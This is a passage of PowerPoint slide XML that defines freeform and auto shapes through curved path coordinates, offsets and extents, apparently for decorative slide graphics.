                <a:lnTo>
                  <a:pt x="390525" y="2105025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438845" y="2104313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486812" y="2102192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534406" y="2098681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581605" y="2093801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628392" y="2087570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="674745" y="2080010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720645" y="2071140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766071" y="2060979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="811004" y="2049549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855425" y="2036868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899312" y="2022957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942646" y="2007836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985408" y="1991524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1027576" y="1974041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069132" y="1955408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110056" y="1935645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150327" y="1914770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189925" y="1892805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228831" y="1869768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1267025" y="1845681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1304486" y="1820563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1341196" y="1794433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377133" y="1767313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1412278" y="1739221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1446612" y="1710177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1480113" y="1680202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1512763" y="1649316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1544541" y="1617538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1575427" y="1584888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605402" y="1551387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634446" y="1517053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1662538" y="1481908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1689658" y="1445971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1715788" y="1409261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1740906" y="1371800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1764993" y="1333606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1788030" y="1294700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809995" y="1255102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830870" y="1214831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850633" y="1173907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1869266" y="1132351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886749" y="1090183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903061" y="1047421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1918182" y="1004087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932093" y="960200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944774" y="915779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1956204" y="870846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966365" y="825420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975235" y="779520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1982795" y="733167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989026" y="686380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993906" y="639181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997417" y="591587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999538" y="543620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2000250" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999538" y="446979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997417" y="399012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993906" y="351418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989026" y="304219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1982795" y="257432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975235" y="211079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1966365" y="165179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1956204" y="119753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1944774" y="74820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932093" y="30399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922457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Freeform 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20669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9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AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066925" y="704850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2066925" y="381000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2066925" y="542925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Freeform 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800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828800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Freeform 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800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Freeform 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800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Freeform 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15811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AutoShape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="70485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581150" y="38100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581150" y="542925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Freeform 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="133350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AutoShape 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="70485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333500" y="38100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333500" y="542925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Freeform 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11239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AutoShape 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950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23950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23950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Freeform 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825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1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1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885825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Freeform 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825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Freeform 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825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63817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AutoShape 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175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AutoShape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175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AutoShape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638175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3905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390525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AutoShape 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525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8" name="AutoShape 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390525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9" name="Freeform 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11191875" y="3619500"/>
            <a:ext cx="1000125" cy="3238500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1000125" h="3238500">
                <a:moveTo>
                  <a:pt x="1000125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3238500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000125" y="3238500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100012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0" name="Freeform 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10758488" y="4309998"/>
            <a:ext cx="1433830" cy="2548255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1433829" h="2548254">
                <a:moveTo>
                  <a:pt x="0" y="2548000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="63" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4553" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10089" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17750" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27485" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39243" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52972" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68621" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86139" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105474" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126574" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149389" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173868" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199958" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227608" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256767" y="319395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287384" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319408" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352786" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387468" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423403" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="460538" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498823" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538206" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578636" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620061" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="662430" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705692" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749796" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="794690" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840322" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="886642" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933598" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="981138" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1028551" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075508" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1121829" y="10029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1167464" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1212360" y="27430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256467" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299732" y="52923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342106" y="68576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1383535" y="86098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1423969" y="105437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1433512" y="11055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1" name="Freeform 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982351" y="541972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25" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23850" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14547" y="1873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6959" y="6984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1847" y="14573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1847" y="33051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6982" y="40655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14557" y="45753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23850" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395325" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404557" y="45751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412116" y="40640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417203" y="33105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419074" y="23875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="417203" y="14573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412105" y="6984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404554" y="1873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39532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2" name="Freeform 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="558165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3" name="Freeform 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="575310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4" name="Freeform 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="591502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5" name="Freeform 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="608647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6" name="Freeform 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982325" y="624840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7" name="Freeform 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5143500"/>
            <a:ext cx="2133600" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2133600" h="1333500">
                <a:moveTo>
                  <a:pt x="1466850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1466850" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514474" y="1331825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1561193" y="1326878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1606894" y="1318771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651466" y="1307617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694793" y="1293528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736765" y="1276617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777269" y="1256998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816191" y="1234782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1853419" y="1210083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888840" y="1183014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922341" y="1153688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953811" y="1122217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983135" y="1088713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010201" y="1053291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034897" y="1016063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057110" y="977141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2076727" y="936638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093635" y="894668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107721" y="851343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118874" y="806776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126980" y="761079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131926" y="714366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133600" y="666750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131926" y="619140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126980" y="572434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118874" y="526742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107721" y="482179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093635" y="438856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2076727" y="396888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057110" y="356386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034897" y="317465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010201" y="280236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983135" y="244812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953811" y="211307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922341" y="179834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888840" y="150505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1853419" y="123433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816191" y="98732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777269" y="76514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736765" y="56892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694793" y="39978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651466" y="25887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1606894" y="14731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1561193" y="6622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514474" y="1674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146685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8" name="Freeform 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6262682"/>
            <a:ext cx="1633855" cy="595630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1633855" h="595629">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1033462" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1080357" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126266" y="7137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1171055" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214591" y="27823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256741" y="42915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297370" y="60995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1336345" y="81930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373533" y="105587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1408801" y="131832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442014" y="160531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473040" y="191551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1501744" y="224760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1527994" y="260023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551655" y="297207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1572595" y="336178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1590679" y="376804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605775" y="418951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617748" y="462485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1626466" y="507274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631795" y="553183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1633417" y="59531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9" name="Freeform 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6072187"/>
            <a:ext cx="1891030" cy="786130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1891030" h="786129">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1100137" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1148304" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195707" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242264" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287891" y="22423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332508" y="34691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1376029" y="49460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1418374" y="66645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1459459" y="86164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499202" y="107936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1537519" y="131876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1574329" y="157902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1609548" y="185932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643095" y="215883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1674886" y="247672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1704838" y="281216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1732869" y="316433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1758896" y="353241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782837" y="391556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1804609" y="431295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824129" y="472376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841315" y="514717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856083" y="558235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868352" y="602846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1878038" y="648469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885059" y="695020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1889333" y="742417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1890633" y="78581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0" name="Freeform 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5881687"/>
            <a:ext cx="2138680" cy="976630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2138680" h="976629">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1157287" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1204822" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1251774" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1298090" y="10027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343720" y="17690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1388612" y="27426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1432715" y="39186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1475977" y="52917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518347" y="68568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559773" y="86087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600204" y="105424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1639590" y="126527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677877" y="149344"/>
